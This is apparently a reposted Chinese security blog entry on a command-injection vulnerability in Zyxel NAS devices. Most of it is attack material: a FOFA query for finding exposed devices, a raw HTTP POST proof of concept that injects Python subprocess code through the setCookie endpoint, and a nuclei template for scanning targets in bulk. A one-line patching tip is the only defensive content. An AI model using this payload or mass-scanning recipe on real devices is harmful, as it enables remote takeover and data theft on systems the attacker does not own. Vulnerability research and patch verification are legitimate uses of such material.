Zyxel NAS设备命令执行漏洞

 

一、漏洞简述

攻击者能够通过应用程序的远程接口执行任意命令的安全漏洞。这种漏洞可以导致服务器被远程控制，数据被泄露，甚至可以用来进一步攻击网络中的其他系统

二、漏洞复现

搜索语句
fofa：body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"
漏洞poc

POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Length: 239

------WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="c0"

storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#
------WebKitFormBoundaryHHaZAYecVOf5sfa6--

三、批量检测

用法：nuclei.exe -t Zyxel-NAS-RCE.yaml -u 目标

id: Zyxel-NAS-RCE

info:
name: Zyxel-NAS设备-setCookie-授权命令注入
author: rainyseason
severity: high
description: Zyxel_NAS设备存在setCookie_未授权命令注入,攻击者可以通过该漏洞获取服务器权限或造成数据丢失
reference: http
metadata:
fofa-query: body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"
verified: true
tags: Zyxel-NAS,RCE,CMS

requests:
- raw:
- |-
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Length: 239

------WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="c0"

storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#
------WebKitFormBoundaryHHaZAYecVOf5sfa6--

matchers-condition: and
matchers:
- type: word
part: body
words:
- uid
- gid
- type: status
status:
- 200

四、修复建议

1.建议更新当前系统或软件至最新版，完成漏洞的修复。

原文始发于微信公众号（安全笔记）：【1day】Zyxel NAS设备命令执行漏洞